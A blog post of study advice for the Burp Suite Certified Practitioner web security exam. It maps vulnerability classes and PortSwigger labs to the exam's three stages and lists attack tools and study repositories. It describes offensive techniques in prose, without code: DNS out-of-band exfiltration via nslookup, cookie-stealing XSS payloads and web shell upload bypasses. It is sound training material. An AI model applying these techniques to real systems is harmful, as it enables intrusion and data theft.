Post cover image

June 12, 2026

How To Pass the Burp Suite Certified Practitioner (BSCP) Exam in 2026

What the exam actually is

Shawn

7 min read

What the exam actually is

The BSCP is a 4 hour, fully hands on, proctored, open-book practical exam for web application security. You get two web apps, and each one contains three deliberately planted vulnerabilities arranged into three sequential stages. That's six stages total, and you have to clear all six to pass. There's no partial credit. Five out of six is a fail.

The three stages are always the same way, and they must be solved in order because each one literally unlocks the part of the app you attack next:

  1. Stage 1 — Get into ANY user account. Its not always Carlos! Land any authenticated user session.
  2. Stage 2 — Reach the admin interface at /admin or equivalent. Either escalate your own privileges or compromise the administrator account.
  3. Stage 3 — Read /home/carlos/secret from the server's filesystem and submit it with the "Submit solution" button.

A few mechanics:

  • It's open book. Your notes, the web, third-party tools, and any Burp extensions are all fair game. PortSwigger says so explicitly.
  • There is no lab reset. If you delete your own account or nuke a core component, you can mess up the attempt and waste your credit. Be deliberate with destructive actions.
  • The exam is dynamic. Different vulnerabilities and scenarios each time…so if you fail like your 1st attempt like I did, you will probably see a different the next time.

The single most important mental model: figure out which stage you're on, then only hunt for the vulnerability classes that belong to that stage. Don't try to deserialize your way into a user account or do XSS on Stage 3. Map the bug families to the stages and you stop running in circles.

For example, follow this for guidance from BotesJuan:

None

The gotchas that failed my first attempt

Every PortSwigger lab trains you on carlos but when it comes to the exam, its NOT always carlos! Treat the username as something you discover, never something you assume.

On the exam you frequently may only get DNS callbacks only, which means you need to actually exfiltrate the secret over out-of-band DNS … something like packing the file contents into a subdomain of your Collaborator address via nslookup. See the Practice Exam to try examples of DNS callbacks using nslookup. Here are the Youtube resources for Practice Exam walkthrough:

https://www.youtube.com/watch?v=yC0F05oggTE
https://www.youtube.com/watch?v=fNoX_9v6-aY

How to prepare

This is the plan I'd give anyone, in order.

1. Do every Apprentice and Practitioner lab in the Web Security Academy.

2. Do mystery labs blind.

3. Take the official practice exam. The real exam is structurally identical to the practice one so take it as many times as you need.

3. Review the 2 Github resources I've linked at the end of this post as they are GOLD.

4. Load up your payload lists, extensions in Burp ahead of time.

The labs that matter most, by stage

These are the labs I'd prioritize, grouped by the stage they map to. The ones marked must do are the ones I think are most important.

Stage 1 — Get access to any user

This stage is going to be authentication flaws, XSS used to steal a session, cache poisoning, and host-header stuff. So focus on host header injection, web cache poisoning, XSS especially DOM XSS, HTTP request smuggling and brute forcing stuff. Don't be trying XXE or any stage 2/3 techniques here! Best labs to work on:

  • Username enumeration via different responses
  • SQL injection vulnerability allowing login bypass
  • SQL injection in a WHERE clause retrieving hidden data
  • Stored XSS into HTML context with nothing encoded
  • Reflected XSS into HTML context with most tags and attributes blocked
  • 2FA simple bypass
  • Basic password reset poisoning (host header)
  • Host header authentication bypass
  • OS command injection, simple case (now go learn the OOB-exfil version — see the gotcha above)
  • Username enumeration via subtly different responses / via account lock
  • Brute-forcing a stay-logged-in cookie, and offline password cracking
  • Exploiting XSS to steal cookies and to capture passwords
  • Web cache poisoning: unkeyed header, multiple headers, and targeted poisoning via an unknown header
  • HTTP request smuggling: basic CL.TE and TE.CL, capturing other users' requests, delivering reflected XSS
  • DOM XSS via web messages (and the JSON.parse variant)
  • Information disclosure in version control history

Stage 2 — Escalate to admin

This is going to be either Access Controls like IDOR, JWT, OAuth, CSRF, SQL injection. Best labs to work on:

  • User role controlled by a request parameter
  • User ID controlled by a request parameter with password disclosure
  • Method-based access control circumvented (GET instead of POST)
  • URL-based access control circumvented (X-Original-URL)
  • JWT authentication bypass via unverified signature
  • JWT authentication bypass via flawed signature verification (alg:none)
  • SQL injection UNION attack retrieving data from other tables
  • SQL injection listing database contents on non-Oracle databases
  • Authentication bypass via OAuth implicit flow
  • Privilege escalation via server-side prototype pollution
  • Web shell upload — Content-Type bypass, extension blacklist bypass, and obfuscated extension
  • JWT: weak signing key brute force, jwk/jku header injection, kid header path traversal
  • OAuth: forced profile linking, account hijacking via redirect_uri, stealing tokens via open redirect
  • The CSRF family: token not tied to session, validation depends on request method, validation depends on token being present, Referer-based defenses
  • SQLi: blind with conditional responses, time delays, and the filter bypass via XML encoding
  • Modifying serialized data types

Stage 3 — Read /home/carlos/secret

Everything here is about reading a file or getting code execution: SSTI, directory traversal, XXE, SSRF, OS command injection, and deserialization. Best labs to work on:

  • Basic SSRF against the local server
  • Arbitrary object injection in PHP
  • Server-side template injection: basic, using documentation, in an unknown language with a documented exploit, and with information disclosure via user-supplied objects
  • File path traversal: simple case, sequences stripped non-recursively, superfluous URL-decode bypass, validation of start of path
  • XXE: external entities to retrieve files, blind XXE exfil via a malicious external DTD, blind XXE via error messages, XInclude
  • SSRF: blacklist-based filter, filter bypass via open redirection, against another back-end system
  • Blind OS command injection with out-of-band data exfiltration — the stage-3 version of the gotcha

Tooling: what to have ready and what each tool is for

You're allowed to use anything. Here's the kit I'd actually have open, mapped to where it earns its keep.

Run targeted scans on certain injection points (see the lab Practical Skills) along with manual testing methods.

The extensions I'd load: JWT Editor or JSON Web Tokens, HTTP Request Smuggler (smuggling detection and payload building), Java Deserialization Scanner (to fingerprint serialized objects), DOM Invader (DOM XSS and prototype pollution), Hackvertor, and Param Miner.

Command line tools, by stage:

  • DOMInvader — Use this to determine if you have a DOM XSS vulnerability.
  • XSStrike — Although I didn't use this on the exam, its still pretty useful to have in the toolkit.
  • jwt_tool — Check JWT weaknesses (unverified signature, alg:none, weak-key brute force, jwk/jku/kid injection). Stage 2 stuff.
  • ysoserial — Java deserialization gadget chains. See the practice exam for this. Stages 2–3 stuff.
  • phpggc — PHP deserialization / object-injection gadget chains. Stages 2–3.
  • sqlmap — automates SQLi discovery and data extraction; great for grabbing admin creds fast. Stages 1–2.
  • SSTImap — automates server-side template injection through to RCE/file read. Stage 3.

Burp Collaborator. Nearly every blind and out-of-band variant in the exam routes through it: blind XXE, blind SQLi exfil, blind OS command injection, SSTI exfil. Get comfortable crafting payloads that ship data into a Collaborator subdomain.

Exam day playbook

  • Budget the clock across both apps, not per stage. Four hours, six stages. If one stage turns into a rabbit hole, bank progress on the other app and come back.
  • Scan first, then go manual. Let targeted scans surface the obvious injection points while you reason about the app.
  • Write down every solution as you go. If the same bug recurs (and across attempts, they do), a written solution buys you free time later.
  • Don't break the box. No reset, remember. Avoid deleting your own account or core components.
  • Enumerate, enumerate enumerate. Like most of these exams and the real world, have a good understanding of what an application does, how it behaves and where the main parts of the functionality are. Dont assume anything. The app is telling you things. Read the responses. Read the page source.
  • New Functionality — If you see a new functionality after getting to a user stage, that is probably your next path forward. Same with getting to admin panel. Once you see a new function that is most likely what you are supposed to target.
  • Stuck? — If you are on a specific stage, go through the automated and manual checks of what you need to do on that particular stage. You should be able to identify what vulnerability it is at each stage. If you can't, look at the Stages of what is supposed to be vulnerable. If you are stuck at trying to craft a payload? Use and customize the payloads in the 2 Github resources below based on the specific vulnerability.
  • Exam Wierdness: Don't use more than 2 monitors! This messed up my 1st attempt as I was using 3 monitors and it basically bricked my computer for a good while when I started up their proctoring. So keep in mind to not exceed 2 screens or you will have a rough time! For 2nd attempt, I loaded up the proctoring in a new Chrome profile and only used 2 screens.

Resources

The two GitHub repos plus the Portswigger Security Academy itself are all you need to pass this exam.

  • PortSwigger Web Security Academy — the labs, the cheat sheets, and the official prep page. The source of truth: https://portswigger.net/web-security
  • botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study — a deep, well-maintained study repo. Their cookie-stealer payload collection is the one I leaned on for Stage 1 (Collaborator fetch(), document.location redirects, image-onerror exfil, password-capture handlers) already adapted for the exploit server. Full credit to botesjuan. https://github.com/botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study
  • DingyShark/BurpSuiteCertifiedPractitioner — a stage-by-stage guide that organizes every vulnerability family by which stage it belongs to, with per-bug approaches and where each tends to live in the app. Full credit to DingyShark. https://github.com/DingyShark/BurpSuiteCertifiedPractitioner

Use the repos to understand technique and to recover when you're stuck, but do the labs yourself.

Final word

The BSCP isn't about memorizing payloads, it's about recognizing which bug family lives at which stage, enumerating instead of assuming, and being able to do out-of-band exfiltration. Do the labs, drill the mystery challenges blind, learn from the gotchas that got me, and you'll walk in ready.

Good luck. Go read that secret.